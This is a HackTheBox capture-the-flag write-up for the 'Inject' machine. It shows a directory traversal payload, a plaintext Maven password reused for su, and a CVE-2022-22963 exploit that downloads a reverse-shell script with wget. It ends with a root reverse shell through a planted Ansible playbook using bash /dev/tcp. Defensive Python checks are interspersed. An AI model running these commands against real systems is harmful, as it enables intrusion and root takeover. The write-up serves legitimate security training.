# HackTheBox "Inject"

<figure><img src="/files/KMQMSSIS1yotlY90sE8N" alt="Info Card"><figcaption><p>Info Card</p></figcaption></figure>

## Introduction

[Inject](https://www.hackthebox.com/machines/inject) is an easy box released on March 11th, 2023 by rajHere.

## User Own

Nmap:

```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-17 12:14 EDT
Nmap scan report for 10.10.11.204
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
```

There is a website at `10.10.11.204:8080`.

The file upload only accepts images, so there is not much to do there. However, `GET /show_image?img=` is vulnerable to directory traversal: the `img` parameter is used as a file path without being confined to the image directory.

```
../../../../../../etc/passwd
```

<figure><img src="/files/3Y5pqBrvXrMC8yGLcZc2" alt="Burp Suite Repeater"><figcaption><p>Burp Suite Repeater</p></figcaption></figure>
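As an added example (my code, not from this write-up or from the box's web app), here is the check a `/show_image` handler needs so the `img` parameter cannot leave the image directory; `base_dir` and the sample upload directory are constructed for the demo:

```python
# Added example (not code from the write-up or from the box's web app): the
# check a /show_image handler needs so the img parameter cannot leave the image
# directory. The traversal payload used above, ../../../../../../etc/passwd,
# and an absolute path such as /etc/passwd are both refused.
import os
import tempfile
from pathlib import Path

class TraversalError(ValueError):
    """Raised when the requested name resolves outside the image directory."""

def resolve_image(img: str, base_dir: str) -> Path:
    """Map the img query parameter to a path that stays under base_dir."""
    if "\x00" in img:
        raise TraversalError("NUL byte in path")
    base = Path(base_dir).resolve()
    # Path.resolve() collapses '..' segments and follows symlinks, so the
    # containment check is done on the canonical location, not the raw string.
    # Joining an absolute img discards base, which the same check catches.
    candidate = (base / img).resolve()
    if base not in candidate.parents:
        raise TraversalError(f"refusing path outside image dir: {img!r}")
    return candidate

def is_safe(img: str, base_dir: str) -> bool:
    """True when img would be served, False when the handler should reject it."""
    try:
        resolve_image(img, base_dir)
    except TraversalError:
        return False
    return True

def demo() -> dict:
    """Exercise the check against a constructed upload directory."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "uploads")
        os.mkdir(base)
        Path(base, "cat.jpg").write_bytes(b"\xff\xd8demo")  # constructed image
        return {
            "cat.jpg": is_safe("cat.jpg", base),
            "nested": is_safe("2023/cat.jpg", base),
            "traversal": is_safe("../../../../../../etc/passwd", base),
            "absolute": is_safe("/etc/passwd", base),
            "dot_dot_only": is_safe("..", base),
        }
```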

`/etc/passwd` shows there are two users named `frank` and `phil`. `phil`'s home directory contains the `user.txt` flag. `frank`'s home directory contains an unusual directory called `.m2` (Maven's local configuration directory). `.m2` contains a `settings.xml` with credentials in it.

{% code title="settings.xml" %}

```
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>
```

{% endcode %}
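As an added example (my code, not the box's or Maven's), here is a small audit that flags `<server>` entries whose `<password>` is stored in plaintext rather than in Maven's `{...}` encrypted form; the sample `settings.xml` below is constructed with placeholder values:

```python
# Added example (not from the write-up): audit a Maven settings.xml for the
# mistake found in /home/frank/.m2 above, a plaintext <password> in a <server>
# entry. Maven can store server passwords encrypted with a master key from
# settings-security.xml; those values appear as {...} in settings.xml, so any
# other non-empty password is reported as plaintext.
import re
import xml.etree.ElementTree as ET

MAVEN_NS = "http://maven.apache.org/POM/4.0.0"  # namespace used in the file above
ENCRYPTED_RE = re.compile(r"^\{[^}]*\}$")

def find_plaintext_server_passwords(settings_xml: str) -> list:
    """Return (server id, username) pairs whose <password> is not {encrypted}."""
    root = ET.fromstring(settings_xml)
    ns = {"m": MAVEN_NS}
    findings = []
    for server in root.findall("m:servers/m:server", ns):
        pw_el = server.find("m:password", ns)
        if pw_el is None or not (pw_el.text or "").strip():
            continue  # no password, or key-based auth only
        if ENCRYPTED_RE.match(pw_el.text.strip()):
            continue  # stored in Maven's encrypted form
        sid = (server.findtext("m:id", default="?", namespaces=ns) or "?").strip()
        user = (server.findtext("m:username", default="?", namespaces=ns) or "?").strip()
        findings.append((sid, user))
    return findings

# Constructed sample with the same layout as the settings.xml above; the
# credential values are placeholders, not the box's.
SAMPLE_SETTINGS = f"""<settings xmlns="{MAVEN_NS}">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>PLAINTEXT-PLACEHOLDER</password>
    </server>
    <server>
      <id>corp-nexus</id>
      <username>deploy</username>
      <password>{{COQLCE6DU6GtcS5P=}}</password>
    </server>
    <server>
      <id>keyonly</id>
      <privateKey>${{user.home}}/.ssh/id_ed25519</privateKey>
    </server>
  </servers>
</settings>
"""

def demo() -> list:
    """Run the audit over the constructed sample."""
    return find_plaintext_server_passwords(SAMPLE_SETTINGS)
```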

While we now have credentials, they don't work for logging in as `phil` over SSH.

Checking `/var/www/WebApp/pom.xml`, the web app uses Spring Cloud 3.2.2, which is vulnerable to CVE-2022-22963 (a SpEL injection in Spring Cloud Function). This [Python script](https://github.com/lemmyz4n3771/CVE-2022-22963-PoC) gets us a reverse shell as `frank`.

{% code title="Terminal 1" %}

```
python3 -m http.server 80
```

{% endcode %}

{% code title="Terminal 2" %}

```
python3 exploit.py 10.10.11.204:8080 'wget http://10.10.xx.xx/Documents/rev_shell.sh -O /tmp/rev_shell.sh'
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

python3 exploit.py 10.10.11.204:8080 'chmod +x /tmp/rev_shell.sh'
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

python3 exploit.py 10.10.11.204:8080 '/tmp/rev_shell.sh'
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed
```

{% endcode %}

{% code title="Terminal 3" %}

```
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.204] 45152
whoami
frank
```

{% endcode %}

While the password for `phil` won't work for SSH, we can still switch to `phil` from `frank`'s shell with `su phil` and the password from `settings.xml`.

```
su phil
Password: DocPhillovestoInject123
whoami
phil
cd ~
cat user.txt
[USER FLAG HERE]
```

<figure><img src="/files/lpW6ovpxNA7xjqUHv9Yo" alt="USER OWN"><figcaption><p>USER OWN</p></figcaption></figure>

## System Own

Inside `/opt` there is a file called `automation/tasks/playbook_1.yml`.

{% code title="playbook\_1.yml" %}

```
- hosts: localhost
  tasks:
  - name: Checking webapp service
    ansible.builtin.systemd:
      name: webapp
      enabled: yes
      state: started
```

{% endcode %}

Running `pspy` shows an interesting line:

```
CMD: UID=0 PID=15628 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
```

Every `.yml` file inside `/opt/automation/tasks` is run as `root` (`UID=0`) by `ansible-parallel` every 2 minutes.

`/opt/automation/tasks` is only writable by a group called `staff`.

```
grep staff /etc/group
staff:x:50:phil
```

`phil` is in `staff`, so we can put any `.yml` file we want in `/opt/automation/tasks` as `phil`. We can use a custom playbook that gives us a reverse shell as `root`. According to the [Ansible docs](https://docs.ansible.com/ansible/latest/collections/ansible/builtin/shell_module.html), the `shell` module lets a playbook run arbitrary shell commands. This [Gist](https://gist.github.com/Reelix/32ccf1baaa3066654a460265fca53960) does the job.

{% code title="playbook\_custom.yml" %}

```
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1'
```

{% endcode %}
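As an added example (my code, not from the write-up), this audit captures the misconfiguration above as a check: a playbook directory that root executes on a timer but that is writable by a group with non-root members; the mode bits and the `/etc/group` excerpt are constructed inputs:

```python
# Added example (not from the write-up): the privilege-escalation condition
# above is a root cron job running every playbook in /opt/automation/tasks
# while that directory is group-writable by "staff", a group with a non-root
# member (phil). audit_playbook_dir() flags exactly that combination from the
# directory's mode/ownership and /etc/group-format text.
import os
import stat

def parse_groups(group_db: str) -> dict:
    """Map gid -> (group name, member list) from /etc/group-format text."""
    groups = {}
    for line in group_db.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[int(gid)] = (name, [m for m in members.split(",") if m])
    return groups

def audit_playbook_dir(mode: int, uid: int, gid: int, group_db: str) -> list:
    """Return findings for a directory whose .yml files root executes."""
    findings = []
    if uid != 0:
        findings.append("directory not owned by root")
    if mode & stat.S_IWOTH:
        findings.append("directory is world-writable")
    if mode & stat.S_IWGRP and gid != 0:
        name, members = parse_groups(group_db).get(gid, (str(gid), []))
        findings.append(
            f"directory is writable by group {name!r}; its non-root members can "
            f"drop playbooks that run as root: {members or 'none listed'}"
        )
    return findings

def audit_path(path: str, group_db: str) -> list:
    """Convenience wrapper that reads mode and ownership from the filesystem."""
    st = os.stat(path)
    return audit_playbook_dir(st.st_mode, st.st_uid, st.st_gid, group_db)

# Constructed /etc/group excerpt mirroring the grep output above.
SAMPLE_GROUP_DB = "root:x:0:\nstaff:x:50:phil\nphil:x:1001:\n"

def demo() -> tuple:
    """Constructed inputs: the box's layout (root:staff 2775) vs. root-only 755."""
    inject_like = audit_playbook_dir(0o42775, 0, 50, SAMPLE_GROUP_DB)
    hardened = audit_playbook_dir(0o40755, 0, 0, SAMPLE_GROUP_DB)
    return inject_like, hardened
```

On a live host, `audit_path("/opt/automation/tasks", open("/etc/group").read())` gives the same answer from the real directory.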

Once the system runs our playbook, we get a reverse shell as `root`, letting us read the `root.txt` flag.

```
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.204] 56648
bash: cannot set terminal process group (17831): Inappropriate ioctl for device
bash: no job control in this shell
root@inject:/opt/automation/tasks# cat /root/root.txt
cat /root/root.txt
[ROOT FLAG HERE]
```

<figure><img src="/files/6rVNhcvdyMaEbhk8bYpU" alt="SYSTEM OWN"><figcaption><p>SYSTEM OWN</p></figcaption></figure>

And that's the box!

<figure><img src="/files/bKWAd8wMi4kIp06PLM4k" alt="PWNED"><figcaption><p>PWNED</p></figcaption></figure>

